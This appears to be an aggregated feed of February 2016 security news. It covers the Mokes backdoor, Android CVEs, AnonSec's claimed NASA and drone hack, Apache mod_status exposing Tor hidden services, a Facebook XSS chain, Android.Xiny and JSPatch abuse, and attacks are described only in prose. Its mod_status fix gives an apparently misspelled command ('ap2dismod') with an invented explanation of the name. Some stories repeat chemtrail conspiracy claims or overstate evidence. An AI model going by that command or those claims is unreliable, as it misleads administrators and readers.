The authors digitally signed the code with a trusted certificate issued by COMODO RSA Code Signing CA, but Kaspersky did reveal the name of the entity that issued the certificate.
“Next, it connects to its hardcoded C&C Server. From this point, it performs an http request every minute. This “heartbeat” request replies with a one-byte image. To upload and receive data and commands, it connects to TCP port 433 using a custom protocol and AES encryption.”
A few days ago, the experts spotted a second backdoor called OLMyJuxM.exe(Backdoor.Win32.Mokes.imv) infecting Windows machine. The analysis of this strain of malware allowed the experts at Kaspersky to discover that this backdoor is a 32-bit Windows variant of the DropboxCache backdoor.
“Just a few days ago, we came across a rather familiar looking sample, although it was compiled for machines running Microsoft Windows. It quickly turned out to be a 32-bit Windows variant of Backdoor.Linux.Mokes.a.” continues the post.
The Windows variant of the DropboxCache backdoor uses the same filename templates to save the obtained audio captures, screenshot, keylogs and other data. Unilike the Linux variant, the strain for Windows enable the Keylogging feature at the startup.
What about the future?
Experts speculate that we will find soon a Mac OS X variant in the wild.
Google Patches Critical Remotely-exploitable Flaws in Latest Android Update
2.2.2016
Google has released the February Security Update for Android that patches multiple security vulnerabilities discovered in the latest version of Android operating system.
In total, there were five "critical" security vulnerabilities fixed in the release along with four "high" severity and one merely "moderate" issues.
Remote Code Execution Flaw in WiFi
A set of two critical vulnerabilities has been found in the Broadcom WiFi driver that could be exploited by attackers to perform Remote Code Execution (RCE) on affected Android devices when connected to the same network as the attacker.
The vulnerabilities (CVE-2016-0801 and CVE-2016-0802) can be exploited by sending specially crafted wireless control message packets that can corrupt kernel memory, potentially leading to remote code execution at the kernel level.
"These vulnerabilities can be triggered when the attacker and the victim are associated with the same network," reads the advisory. "This issue is rated as a Critical severity due to the possibility of remote code execution in the context of the kernel without requiring user interaction."
Remote Code Execution Flaw in Mediaserver
Another set of two critical security vulnerabilities were discovered in Mediaserver that was targeted last summer by critical Stagefright vulnerabilities and exploits, allowing anyone to compromise an Android device by sending just a specially crafted MMS message.
The recently discovered flaws (CVE-2016-0803 and CVE-2016-0804) in Mediaserver could enable remote code execution (RCE) on affected Android devices through email, web browsing, or MMS files when processing media files.
Moreover, a separate vulnerability called elevation of privilege (CVE-2016-0810) was also discovered in Mediaserver that could be exploited to gain elevated capabilities, including Signature or SignatureOrSystem permissions privileges, that aren’t accessible to third-party apps.
Two Elevation of Privilege vulnerabilities has also been found in Qualcomm components: the Qualcomm Performance Module (CVE-2016-0805) and the Qualcomm Wi-Fi Driver (CVE-2016-0806). Both the flaws, rated as critical, leveraged an attacker to launch further attacks.
Another critically rated bug (CVE-2016-0807) discovered in the Debuggerd component could open the door to execute arbitrary code within the device's root level. Debuggerd is a software tool used for debugging and analyzing Android crashes.
Other high severity bugs include:
An elevation of privilege vulnerability in the Android Wi-Fi component
A denial-of-service vulnerability in the Minikin library
An information disclosure bug in libmediaplayerservice
The final set of vulnerabilities is an Elevation of Privilege flaw in Setup Wizard that could allow a hacker to bypass the Factory Reset Protection and gain access to the affected device.
All the Security patches are currently made available for Nexus devices only. Google also shared the patches with carrier and manufacturer partners on January 4, but users of other Android devices should have to wait until their devices receive an update.
Nexus device users are advised to patch the flaws by flashing their devices to this new build immediately. Users can also wait for the OTA (Over-the-Air) update that will be out in the next week or so.
Microsoft Starts automatically Pushing Windows 10 to all Windows 7 and 8.1 Users
2.2.2016
As warned last year, Microsoft is pushing Windows 10 upgrades onto its user's PCs much harder by re-categorizing Windows 10 as a "Recommended Update" in Windows Update, instead of an "optional update."
Microsoft launched Windows 10 earlier last year and offered the free upgrade for Windows 7 and Windows 8 and 8.1 users. While the company has been successful in getting Windows 10 onto more than 200 Million devices, Microsoft wants to go a lot more aggressive this year.
So, If you have enabled Automatic Windows Update on your Window 7, 8 or 8.1 to install critical updates, like Security Patches, you should watch your steps because…
...From Monday, Windows Update will start upgrading your PC to the newest Windows 10 as a recommended update, Microsoft confirmed.
Must Read: How to Stop Windows 7 or 8 from Downloading Windows 10 Automatically.
This means Windows 10 upgrade process will download and start on hundreds of millions of devices automatically.
The move is, of course, the part of Microsoft's goal to get Windows 10 running on 1 Billion devices within 2-3 years of its actual release.
market-share-windows10
Market Share of Windows 10 is on the rise. It has already grabbed a market share of 11.85% as of January 2016, increasing from 9.96% in December. But, Windows 7 is still running on over 50% of all PCs in the world, so targeting even half of its user base would bring Microsoft very near to its goal.
"As we shared in late October on the Windows Blog, we are committed to making it easy for our Windows 7 and Windows 8.1 customers to upgrade to Windows 10," a Microsoft spokesperson said. "We updated the update experience today to help our clients, who previously reserved their upgrade, schedule a time for their upgrade to take place."
Also Read: If You Haven't yet, Turn Off Windows 10 Keylogger Now.
This means if the 'Give me recommended updates the same way I receive important update' option in Windows Update section is enabled on your PC, the Windows 10 update will not only be downloaded but also, the installation will be started automatically.
windows10-update
You are also required to stay alert because even if you have adopted manual updates you may still end up downloading Windows 10 anyway. As Windows Update is automatically pre-selecting the option for you, without your need to click on the box to get it.
Must Read: Just Like Windows 10, Windows 7 and 8 Also Spy on You – Here's How to Stop Them.
However, the company says that you won't be forced to upgrade the creepy OS as there will still be a prompt window that will require you to click through and confirm the Windows 10 upgrade after the files have silently been downloaded and unpacked in the background.
Even if the Windows 10 upgrade is accidentally completed, there is still a way to opt out of it. Microsoft is offering a 31 day grace period in which you will be able to revert to your old installation after trying Windows 10 and deciding you not like the operating system.
Though we know this revert will also be an aggressive push by Microsoft.
NASA hacked by AnonSec that hijacked a $222m Global Hawk drone
2.2.2016
Anonsec group hacked NASA network and released a data dump of data online. The hackers also hijacked a Global Hawk drone.
Hackers belonging to the AnonSec group have released online 250GB of data stolen from systems at the NASA, the hackers revealed to have hijacked a drone the Agency uses to run high-altitude testing and sampling missions.
“So yeah, we know what you’re thinking, hacking NASA? How fucking cliche… If only I had a Dogecoin for every time someone claimed that, amiright?” the group wrote on PasteBin. ” Its like the boy who cried wolf but with hacking NASA instead lol But you might be surprised how low govt security standards can be, especially with a limited budget and clueless boomers controlling the network. NASA has been breached more times than most people can honestly remember (our favorites were Gary McKinnon && Mendax’s milw0rm) //you know, when people used to have legit reasons for their hacks. Reasons from searching for hidden evidence of UFO technology to protesting use of Uranium based rocket fuel ^_^”
The stolen data includes names, email addresses and numbers of 2,414 NASA employees, as well as more than 2,000 flight logs and 600 video feeds from the aircraft used by the NASA during its missions.
NASA global_hawk_565
The Anonsec hackers haven’t hacked the NASA systems, they revealed to have paid other hackers for the access to an agency system. Anonsec gained a user account running on a fully patched version of Debian, but the group used it for lateral movements inside the systems at the Agency.
Also in this case, poor security advantaged the work of the hackers that scanned the NASA network searching for accounts using the login and password “root.”
Surprisingly it took only a few tenths of a second to find systems with so poor configurations, by exploiting these systems the hackers designed a map of NASA network.
The Anonsec hackers breached the networks at the NASA’s Glenn Research Center, Goddard Space Flight Center, and Dryden Flight Research Center.
Scanning the networks they were able to gain full root access to three network-attached storage (NAS) devices used by the Agency to store the aircraft flight logs.
The Anonsec group seems to be interested in finding evidence of the chemtrail conspiracy theory. According to the theory, some governments are using aircraft to spread chemical or biological agents to influence the weather for various purposes, including the war.
“One of the main purposes of the Operation was to bring awareness to the reality of Chemtrails/CloudSeeding/Geoengineering/Weather Modification, whatever you want to call it, they all represent the same thing. NASA even has several missions dedicated to studying Aerosols and their affects (sic) on the environment and weather, so we targeted their systems,” the group states.
The hacking crew speculates that the US government is distributing heavy metals throughout the atmosphere to control the weather, but these chemical agents have a devastating effect on the human health.
The group explicitly refers GeoEngineering and Genetically Modified Organisms(GMOs) produced by Monsanto.
“Here is a patent titled “Stress tolerant plants and methods thereof,” that is owned by Monsanto, and seems to address all forms of abiotic stress that weather manipulation and chemtrails can cause: Monsanto Drought and Abiotic Resistant Corn http://www.google.com/patents/US7851676“
“Since organic plants (non-GMO) can’t grow in harsh environments like GMOs they are forced to use Monsanto’s seeds,” the group said.
“However they are Terminator Seeds, which means they don’t reproduce any usable seeds for the farmer, they have to keep buying more. So no more independent farmers and Monsanto controls a majority of the food supply through the farmers.”
The group claimed to have hijacked a Global Hawk drone used by the NASA while it was on a flight over the Pacific.
According to the hackers the hack of the drone was quite easy, they discovered that the Global Hawk UAV follows a flight plan provided by the control center, it is a .gpx file uploaded to the vehicle.
It was a joke for the hackers to write their own flight plan and upload it to the drone. The hackers tried to force the crashing of the drone into the sea, but the controllers at the NASA noticed changes in the path and took manual control avoiding problems and locking out of the hackers from the system.
Default conf on Apache Web servers can de-anonymize your hidden service
2.2.2016
A default setting in Apache Web servers can de-anonymize the hidden service allowing an attacker to obtain details on the hosting.
An unknown student has discovered a serious issue in Apache Web Server that could potentially de-anonymize .onion-domains and servers hidden behind the Tor-network. The student already reported the issue to the Tor Project development team for some months
“Tor makes it possible for users to hide their locations while offering various kinds of services, such as web publishing or an instant messaging server. Using Tor “rendezvous points,” other Tor users can connect to these hidden services, each without knowing the other’s network identity. ” is the description provided by the official Tor Project for the hidden service protocol.
Web sites hosted on the Tor Network could run on different web services, including an Apache Web Server, in this case anonymity of users is at risk.
The issue affects the configuration of Apache Web servers that come with the mod_status module enabled by default. The student discovered that the mod_status module could disclose the real IP address of .onion domains, allowing attackers to de-anonymize Onion Servers.
The Apache Status module allows monitoring activities of an Apache Web Server, it displays a sort of cockpit including current server statistics. The current server state includes the following information:
The number of worker serving requests
The number of idle worker
The status of each worker, the number of requests that worker has performed and the total number of bytes served by the worker (*)
A total number of accesses and byte count served (*)
The time the server was started/restarted and the time it has been running for
Averages giving the number of requests per second, the number of bytes served per second and the average number of bytes per request (*)
The current percentage CPU used by each worker and in total by Apache (*)
The current hosts and requests being processed (*)
By enabling the mod_status module, the output produced by the module would be available when accessing the URL:http://website.com/server-status/, this means that in case your .onion domain may result in exposing ‘server-status’ page.
This page would spit the sensitive backend data like server’s settings, uptime, resource usage, total traffic, virtual hosts, and active HTTP requests if enabled by default which is enough to figure out the Server location.
“On most distributions, Apache ships with a handy feature called mod_status enabled. It’s a page located at /server-status that displays some statistics, like uptime, resource usage, total traffic, enabled virtual hosts, and active HTTP requests. For security reasons, it’s only accessible from localhost by default.
This seems fairly reasonable, until you realize the Tor daemon runs on localhost. Consequently, any hidden service using Apache’s default config has /server-status exposed to the world. What could a malicious actor do in that case? They could spy on potentially sensitive requests. They could deduce the server’s approximate longitude if the timezone is set. They could even determine its IP address if a clearnet Virtual Host is present.” reads the blog post about the issue.
Operators behind hidden services running on the Apache Server need to disable the mod_status to avoid the disclosure of their identity.
To disable to mod_status run the following code:
sudo ap2dismod status
Once disabled the mod_status, users will be displayed a 403 or 404 Error message.
Dutch Police Training Eagles to Take Down Rogue Drones
1.2.2016
You may have seen number of viral entertainment videos on the Internet, titled:
Hawk attacks Drone!
Angry Bird takes down Quadcopter,
and the best one…
Eagle attack: Drone Kidnapped by two Eagles,
...showing eagles, not-so-natural predators, attacking and bringing down drones when someone with a camera tries to invade their private airspace.
Inspired from this:
Dutch Police Training Eagles to Take Down Rogue Drones
The Dutch National Police force is training eagles to take down rogue drones, instead of shooting them, using radio jammers, net-wielding interceptor drones or anti-drone rifle.
We already know the role Sniffer Dogs play for Anti-Bomb squads in detecting hidden bombs and weapons.
If dogs can be trained, so can eagles. Keeping this in mind, it is the first time any police authority has trained eagles to safely bring down bad quadcopters in emergency cases.
Dutch police reportedly collaborated with a raptor training company called 'Guard From Above', to train eagles to recognise drones and then snatch it with its talons.
Check it out in action:
The Police are hoping to get these trained-eagles into their force within next few months.
Hacking Smartphones Running on MediaTek Processors
1.2.2016
A dangerous backdoor has been discovered in the MediaTek processor that could be exploited to hack Android devices remotely.
MediaTek is a Taiwan-based hardware company that manufacture hardware chips and processor used in the smartphones and tablets.
The backdoor was discovered by security researcher Justin Case, who already informed MediaTek about the security issue via Twitter, as the chipset manufacturer had no proper vulnerability reporting mechanism in place.
The vulnerability is apparently due to a debug tool that was opened up for carriers to test the device on their networks, but unfortunately, it was left open in the shipped devices, thus leaving the serious backdoor open to hackers.
If exploited, the debug feature could allow hackers to compromise personal data of an Android device, including user’s private contacts, messages, photos, videos and other private data.
MediaTek acknowledged the issue, saying "We are aware of this issue, and it has been reviewed by MediaTek’s security team. It was mainly found in devices running Android 4.4 KitKat, due to a debug feature created for telecommunication inter-operability testing in China."
The issue actually resides in MediaTek MT6582 processor, which worryingly is being used in many high profile Android devices.
So, if your smartphone is using this processor, the only thing you can do for now is to…
...Keep your Android device off the Internet in an effort to protect yourself.
The company also said that it has notified all OEMs of the potential loophole, so it's now up to the affected OEMs to issue a security patch to close the backdoor.
"While this issue affected certain manufacturers, it also only affected a portion of devices for those manufacturers. We have taken steps to alert all manufacturers and remind them of this important feature," MediaTek spokesperson released a statement.
Audit shows Department of Homeland Security 6 billion U.S. Dollar firewall not so effective against hackers
1.2.2016
A multi-billion U.S. Dollar firewall run by the Department of Homeland Security meant to detect and prevent nation-state hacks against the government functions ineffectively, according to a sanitized version of a secret federal audit.
The National Cybersecurity Protection System (NCPS), also known as EINSTEIN, is a firewall run by the Department of Homeland Security. It’s goal: to detect and prevent nation-state hacks against the U.S. Government functions.
However, according to a sanitized version of a secret federal audit, EINSTEIN does an ineffective job. The audit was described in a ‘for official use only’ Government Accountability Office Report, which was sanitized (public version) and released on Thursday 28 January 2016.
DHS firewall
In November 2015 the U.S. Senate Homeland Security and Governmental Affairs Committee suggested the then-confidential audit of EINSTEIN would prove the hacker surveillance system is not governmentwide.
The newly released audit strengthens their views and points out other misaligned objectives and technologies in the 6 billion U.S. Dollar EINSTEIN project (not acknowledged by DHA)
Gregory C. Wilshusen , GAO director of information security issues, and Nabajyoti Barkakati, director of the GAO Center for Technology and Engineering, said in the report:
“Until NCPS’ intended capabilities are more fully developed, DHS will be hampered in its abilities to provide effective cybersecurity-related support to federal agencies,”
The prevention feature of the system is only deployed at 5 of the 23 major nondefense agencies.
Therefore the U.S. Departments involved in the audit were the departments of Energy and Veterans Affairs, the General Services Administration, the National Science Foundation and the Nuclear Regulatory Commission. The audit report shows the following findings.
EINSTEIN does Not Cover Nation-State ‘Advanced Persistent Threats’
“The overall intent of the system was to protect against nation-state level threat actors,”
EINSTEIN did not protect against nation-state Ádvanced Persistent Threats'(APT) by foreign adversaries.
“EINSTEIN did not possess intrusion detection signatures that fully addressed all the advanced persistent threats we reviewed,”
In reaction to this DHS officials said EINSTEIN is only one technology of many that each department uses to protect its sensitive data. Every agency should keep its own IT and data safe, while DHS should provide the baseline protections and the big-picture perspective of security controls governmentwide.
EINSTEIN doesn’t Know Common Security Vulnerabilities
EINSTEIN works by sending out signatures of known attack patterns to 228 intrusion-detection sensors placed throughout the dot-gov network. These sensors analyze patterns in agency traffic flows to see if there is a match with any of the signatures.
“However, the signatures supporting NCPS’s intrusion detection capability only identify a portion of vulnerabilities associated with common software applications,”
5 client applications were reviewed – Adobe Acrobat, Flash, Internet Explorer, JAVA and Microsoft Office – and only 6 percent 0f all the security bugs tested were flagged (29/489 vulnerabilities).
According to the report a possible reason might be that EINSTEIN doesn’t sync with the standard national database of security flows maintained by NIST (National Institute of Standards and Technology).
DHS officials claim in the report this was not required for the first draft of EINSTEIN, but ‘acknowledges this deficiency’ and plan to address it in the future.
EINSTEIN has no Way to Spot Unknown Zero Days until ‘Announced’
The report states “Regarding zero day exploits,” DHS officials stated “there is no way to identify them until they are announced,”. Once they are disclosed (sometimes with the help of intelligence community partners), DHS can mold a signature to the attack pattern and feed it into EINSTEIN.
Information Sharing with EINSTEIN is Often A Waste
“DHS’s sharing of information with agencies has not always been effective, with disagreement among agencies about the number of notifications sent and received and their usefulness,”
Regarding the reviewed departments, it did not receive 24 percent of the notifications DHS said it had sent in fiscal 2014. The ones that did often served no purpose. Of the 56 alerts communicated successfully, 31 were timely and useful, while the rest were too slow, useless, false alarms or unrelated to intrusion detection.
Besides this, the DHS has created metrics related to EINSTEIN, “None provide insight into the value derived from the functions of the system,” the auditors said.
Conclusion
The findings of the audit report show EINSTEIN MUST be changed to be effective against hackers and foreign adversaries, its primary goal. Otherwise, 6 billion U.S. Dollars is spent on a system not up for its job, resulting in a danger for national security.
About the author
Cordny Nederkoorn
Software test engineer, Founder TestingSaaS, a social network about researching cloud applications with a focus on forensics, software testing and security.
Warning — Popular 'Hot Patching' Technique Puts iOS Users At Risk
1.2.2016
Do you know?… Any iOS app downloaded from Apple’s official App Store has an ability to update itself from any 3rd-party server automatically without your knowledge.
Yes, it is possible, and you could end up downloading malware on your iPhone or iPad.
Unlike Google, Apple has made remarkable efforts to create and maintain a healthy and clean ecosystem of its official App Store.
Although Apple's review process and standards for security and integrity are intended to protect iOS users, developers found the process time consuming and extremely frustrating while issuing a patch for a severe bug or security flaw impacting existing app users.
To overcome this problem, Apple designed a set of solutions to make it easier for iOS app developers to push straightway out hotfixes and updates to app users without going through Apple's review process.
Sounds great, but here's the Kick:
Malicious app developers can abuse These solutions, potentially allowing them to circumvent effectively the protection given by the official App Store review process and perform arbitrary actions on the compromised device, FireEye has warned.
The framework in question is JSPatch – a small JavaScript-to-ObjectiveC engine that developers can integrate in their iOS apps, allowing them to apply hotfixes on their iOS apps simply by adding a few lines of code to their apps.
How Does JSPatch Work?
Once the JSPatch engine loads inside an application, the developer can configure the app always to load a JavaScript file hosted on a remote server, which is controlled by the developer.
Developed by a Chinese developer, JSPatch is utilised in as many as 1,220 iOS apps in the App Store, according to researchers. Although they failed to name the apps, the researchers claim that they have already notified the app providers.
So, in need of security fixes or updates to their app, instead of going through Apple's long-winded update routine, developers can just add some JavaScript code to the file hosted on their server in order to load the code in all the devices where the app is installed.
How to Exploit the JSPatch Framework?
There are two ways to abuse this framework:
If the Developer is with malicious intention.
If developer loads this framework via an unencrypted channel, allowing Man-in-the-Middle attacks.
What if the app developer has bad intention?
A malicious developer can first submit a harmless JSPatch integrated application to the Apple App Store.
Once it passed Apple's inspection and made available on the App Store for users to download, the developer can then easily send malicious JavaScript code to the running application through JSPatch, allowing the developer to perform various actions without being detected.
"JSPatch is a boon to iOS developers," FireEye researchers said in a blog post. "In the right hands, it can be used to quickly and effectively deploy patches and code updates. However, in a non-utopian world like ours, we need to assume that bad actors will leverage this technology for unintended purposes."
What if the app's developer loads JSPatch via an unencrypted channel?
If an application developer uses JSPatch without any malicious intentions, even then the users security is at risk. The developers who load JSPatch via an unencrypted (HTTP) channel could leave communications between the client and the server unprotected.
This could allow an attacker to conduct a man-in-the-middle (MitM) attack to intercept the client and server connection and tamper with the JavaScript content sent to the app in order to perform a malicious action, including:
Access to sensitive information, such as media files and the pasteboard content.
Change system properties.
Load arbitrary public frameworks into the app process.
This isn't the very first-time iOS users are facing such problems. Last October, hundreds of iOS apps in the App Store were found collecting user's private data while violating security and privacy guidelines of Apple.
The discovery came just a month after the XcodeGhost malware was distributed through legitimate iOS Apps via counterfeit versions of Apple's app developer toolkit called Xcode. Here's how to protect yourself against XCodeGhost like iOS flaws.
How to Protect Yourself?
The recommendations to protect yourself against this flaw are standard:
Download apps only from the official App Store, that you need, that you know, and that you trust.
Beware of applications that ask for an extensive amount of permissions and only grant the apps permissions that are necessary.
Manually review "everything" to discover anything malicious in your devices. Rest is up to the company if it wants to improve its application update process to make it speedier, or to allow potential attack vectors that could affect most of its apps and their users.
How Spy Agencies Hacked into Israeli Military Drones to Collect Live Video Feeds
1.2.2016
Featured Image Only. See Original leaked images below.
In a joint surveillance program, the US intelligence agency NSA (National Security Agency) and the British intelligence agency GCHQ (Government Communications Headquarters) hacked into, decrypted, and tracked live video feeds of Israeli Military Drones and Fighter Jets.
This could be one of the most shocking and embarrassing disclosures for Israel, who is the United States’ ally and prides itself on its technical capabilities.
Published by The Intercept, the newly released documents from the former NSA contractor Edward Snowden revealed that in an operation dubbed "Anarchist," UK and US intelligence officials have been…
...regularly accessing Israeli drone cameras, allowing them to watch live video feeds from drones and fighter jets while Israel bombed Gaza and spied on Syria.
But, how the intelligence officials were able to do so.
Also Read: Google Wants to Fly Drones Over Your Head to Deliver High Speed 5G Internet.
How did the Intelligence Agencies Hack into Israeli Drones?
The Documents revealed that British Intelligence agency has installed Military-grade Interception systems at Royal Air Force compound in the Troodos Mountains (Cyprus), which is geographically very near to Israel and Syria.
These Surveillance tools are capable of intercepting analog video feeds from Israeli and Syrian drones.
With the help of some open-source software like Image Magick and AntiSky, agencies were able to decrypt and convert scrambled data from remotely piloted aircraft in order to track the movement of drones.
Must Read: Police Using Planes Equipped with Dirtbox to Spy on your Cell Phones.
The report includes several snapshots of Israeli drones collected in 2009 and 2010 that clearly indicates that Israel has drones with missiles and attack capabilities, which Israel doesn't publicly acknowledge.
One snapshot revealed by The Intercept shows an Israeli IAI Heron Drone — a high-altitude strike drone with 350 kilometers range that is capable of carrying a weapon of a 1-ton load and staying aloft for more than 40 hours.
Despite these leaked images offer the first direct public evidence that Israel flies attack drones, they provide rare visual evidence to support reports that aren't clear enough to conclude anything right now.
For in-depth information, you can read the detailed report here.
Default Apache Configuration Can Unmask Tor Hidden Services
1.2.2016
Default Apache Configuration Can Unmask Tor Hidden Services
Attention Tor Onion Hosters!
A year old loophole in Apache Web Server, uncovered by an unknown Computer Science Student, could potentially unmask the real identity of .onion-domains and servers hidden behind the Tor-network.
Although the loophole was reported on Reddit and to the Tor Project months back, it recently came to the limelight soon after a tweet by Alec Muffet, a well-known security enthusiast and current software engineer at Facebook.
What is Tor Hidden (.onion) Service? Dark Web websites (generally known as 'onion services') with a special domain name that ends with .onion, are called Tor Hidden Service and reachable only via the Tor network.
Tor Hidden Service is a widely popular anonymity network used by Whistleblowers, Underground Markets, Defense Networks and more in order to maintain secrecy over the Internet.
An Onion Website can be hosted on the top of any web servers. But, if you are choosing Apache, then you need to rethink.
Apache Misconfiguration Exposes Tor Hidden Servers
According to the report, most distributions of Apache Server ship with mod_status module, enabled by default, which could disclose the real identity of the .onion domains, placing the Onion Servers at risk of being identified.
Apache's mod_status module helps server administrators to monitor the health of web server with an HTML interface and is accessible via a web browser on its localhost only.
The Output of this module would be available on every server when accessing the URL: http://website.com/server-status/
However, running mod_status module with Tor hidden service may result in exposing ‘server-status’ page to the world via Tor daemon service.
This page would spit the sensitive backend data like server's settings, uptime, resource usage, total traffic, virtual hosts, and active HTTP requests if enabled by default which is enough to figure out the Server location.
"What could a malicious actor do in that case? They could spy on potentially sensitive requests," reads the blog post regarding the issue. "They could deduce the server's approximate longitude if the timezone is set. They could even determine its IP address if a clearnet Virtual Host is present."
How to Disable mod_status on Apache
Now, if you run a .onion domain on top of any Apache Server, then make sure that the mod_status is disabled.
For this, you may need to run this code in shell command:-
sudo ap2dismod status
Where,
"ap2" stands for Apache 2.x
"dis" stands for disable
"mod" stands for module
Soon after this, if you reload, then you would be prompted by a 403 or 404 Error Prompt. The Error message would ensure that you are no longer vulnerable to that Risk.
27% of all detected malware appeared in 2015
1.2.2016
According to a new report from Panda Security more than 84 million new malware samples were detected over the 2015, 27% of all malware of ever.
In 2015, security experts have detected the a record number of new malware, according to a report published by Panda Security more than 84 million new malware samples were collected.
It is an impressive number considering that corresponds to the 27 percent of all malware ever created.
“Last year saw the greatest number of cyberattacks recorded around the world, with a total of 304 million samples, which means that more than a quarter of all malware samples ever recorded were produced in 2015 (27.63%).” states the report.
Giving a closing look at the report it is possible to note that Trojans are the main threats, they account for 51.45 percent, followed by viruses at 22.79 percent, worms at 13.22 percent, potentially unwanted programs such as adware at 10.71 percent and cases of spyware at 1.83 percent.
The spike in the number of threats despite the improvement of Antivirus solution is mainly caused by an intensification of the activities of malware authors. Threat actors are spreading more variations on the same strain of malware with the intent to avoid detection, an operation that benefits of the availability of automated software slightly modify the malicious code.
Fortunately, antivirus vendors are getting smarter improving detection mechanisms and a rapid information sharing that allows them to promptly respond to new threats.
Panda Security confirmed to have a dedicated infrastructure to share malicious code samples with other vendors.
Looking at the geography of the infections, China remains one of the most infected countries in the world (57.24%). The number of infections in China increased nearly 30% more than in 2014. Taiwan was the second with an infection rate of 49.15%, followed by Turkey (42.52%).
New docs confirm CIA planned to kidnap Snowden
1.2.2016
Documents obtained by Denfri.dk media confirm rendition flight used Copenhagen Airport for mission to kidnap Edward Snowden.
According to documents obtained by the Danish media outlet Denfri.dk, the US CIA agency is planning to kidnap Edward Snowden. The documents were obtained by Denfri through a Freedom of Information Act suit in August 2015.
A paramilitary team belonging to the CIA is operative in Copenhagen, ready to kidnap the popular whistleblower and bring him in the US with an aircraft already in the same city.
The CIA agents are following the moves of Snowden trying to exploit a trip in one of the European countries, it would be the moment when kidnaps the man.
The presence of a CIA plane in Copenhagen was first reported in 2014 by The Register, it is a Gulfstream V, registered under the number N977GA.
“On the evening of 24 June 2013, as Snowden arrived in Moscow from Hong Kong intending to fly on to Cuba, an unmarked Gulfstream V business jet – tail number N977GA – took off from a quiet commercial airport 30 miles from Washington DC. Manassas Regional Airport discreetly offers its clients “the personal accommodations and amenities you can’t find at commercial airports”. wrote The Register.
“Early next morning, N977GA was detected heading east over Scotland at the unusually high altitude of 45,000 feet. It had not filed a flight plan, and was flying above the level at which air traffic control reporting is mandatory.”
The same aircraft has been used by the CIA to transport captives to the CIA’s secret prisons set up since 9/11.
The documents obtained by the Denfri confirmed the circumstance revealing that Danish police and government officers approved the positioning of the CIA plane in Copenhagen for unspecified “state purposes.”
The documents include a government letter from FBI representatives that ask for support of the Norwegian government. The law agency requested the Norwegian authorities immediately notify US intelligence agencies in the event that Snowden crossed to Norway, Finland, Sweden or Denmark.
The Danish intelligence has sought to preserve total secrecy in relation to the stationing of the CIA aircraft in Copenhagen .
“Denmark’s relationship with the USA would be damaged if the information [content redacted from the documents] becomes public knowledge,” The Denmark’s interior ministry told Denfri.
I think that the kidnapping Snowden would be a serious error for the US intelligence, according to former NSA Director Keith Alexander, Snowden downloaded more than 1 million secret US government documents, it is likely that those documents are already in the hands of a network of journalist ready to disclose them in case of problems.
Facebook XSS could have allowed attackers to take over users’ accounts
1.2.2016
A security researcher has discovered a serious XSS flaw that could have allowed attackers to take over users’ Facebook accounts.
The security expert Jack Whitton reported a critical XSS vulnerability to Facebook that could be exploited by hackers to take over users’ Facebook accounts. The researchers reported the flaw to Facebook in July 2015, and the company fixed the problem in just 6 hours.
Facebook rewarded $7,500 the expert for the flaw under its bounty program.
The researcher’s attack method has two main aspects: one related to content types and a DNS issue.
Whitton first attempted to get an uploaded file to be interpreted and he discovered that under specific conditions it’s possible by changing the file extension to .html.
Whitton discovered that while the extensions of photos and videos uploaded to Facebook cannot be modified, the extensions of advertising images uploaded via the Ads Manager could be changed.
The expert wrote embedded an XSS payload into a PNG image’s IDAT chunk, which differently from Exif and iTXt data, were not removed by Facebook.
However, files are stored on Facebook’s content delivery network (CDN), which is sandboxed, this means that malicious code in the image can’t read web data such as session cookies from facebook.com due to the same-origin policy.
Whitton discovered a way to upload a hidden script to the CDN, and then to retrieve that script via specific crafted URL that looks like harmless that a user could be tricked into clicking from a facebook.com domain.
In order to make requests to facebook.com directly, Whitton found several Facebook plugins that are designed to be included in an iframe, which bypasses CSRF protections and allows an attacker to steal authentication token and act on the user’s behalf simply by getting the victim to click on a link.
“What we now need to do is load the plugin inside an iframe, wait for the
onload
event to fire, and extract the token from the content.” Whitton explained in a blog post. £We now have access to the user’s CSRF token, which means we can make arbitrary requests on their behalf (such as posting a status, etc).”
If the user were logged in, the malicious script could allow impersonating the victim and access his data.
Dozens of games infected with Xiny available on the Google Play
1.2.2016
Experts at Dr Web discovered dozens of Android game apps in the Google Play Store have been infected with the Android.Xiny Trojan.
Bad news for Android users, according to the security Doctor Web firm dozens of game apps in the Google Play Store have been infected with the Android.Xiny.19.origin Trojan. The malware could allow attackers to control the victim’s mobile device, by installing and running any kind of software (apk files), it also allows to display annoying advertisements.
“However, the main threat of Android.Xiny.19.origin lies in its capability to download and dynamically run arbitrary apk files upon cybercriminals’ command. However, the way it is carried out is rather unique.” states a blog post published by Doctor Web.
The malware collects information from the infected device and sends them back to the command and control server, it gathers the IMEI identifier, the MAC address, version and language of the operating system and the mobile network operator’s name.
Experts at Doctor Web discovered more than 60 games infected by the Android.Xiny distributed in the Official Android Google Play Store. The malicious app were apparently deployed by over 30 different that used different names, including Conexagon Studio, Fun Color Games and BILLAPPS.
“At first glance, these affected games look similar to numerous such-like applications; and they are games indeed, with just one difference—while a user is playing a game, the Trojan is performing its malicious activity.” states Doctor Web.
Another interesting feature implemented by the authors of Android.Xiny is that the malware hides malicious program in specially created images by using steganography. Android.Xiny receives malicious images from the server and then retrieves the apk they contain.
The Android.Xiny malware is able to perform many other malicious operations without the user’s consent. The researchers noticed that despite it is not yet able to gain root privileges, it has the ability to download the proper exploit in order to gain root access to the device.
“Android.Xiny.19.origin can perform other malicious functions, such as to download and prompt a user to install different software, or to install and delete applications without the user’s knowledge if root access is available on the device.” continues the post.
“it can download a set of exploits from the server in order to gain root access to the device for covert installation or deletion of applications.”
Doctor Web has already reported the discovery to Google.
Unfortunately, the fact that the malware author chose the Google Play to distribute the malware is not a novelty, in January Lookout firm discovered 13 Android apps infected with the Brain Test malware and available for download on the official Google Store.
JSPatch hot patching technique puts iOS users at risk
1.2.2016
Security experts at FireEye are warning attackers can exploit the JSPatch hot patching technique to serve malicious code and put iOS users at risk
The release of hot patches for apps already deployed in the official App Store is a time-consuming procedure that results frustrating for developers.
Apple is aware of this drawback, for this reason designed specific solutions to address the issue and make it easier for iOS app developers to release a hotfix patch without passing the strict controls implemented under the Apple’s review process.
Unfortunately, this ‘alternative’ process expose Apple users to the risk of cyber attacks.
The technology under scrutiny is JSPatch, experts at FireEye warn about possible abuse that could allow attackers to push malicious updates for mobile apps in the Official store.
According to the experts at FireEye, attackers could exploit the JSPatch technology to serve malicious updates that could allow the apps to carry out a number of malicious activities.
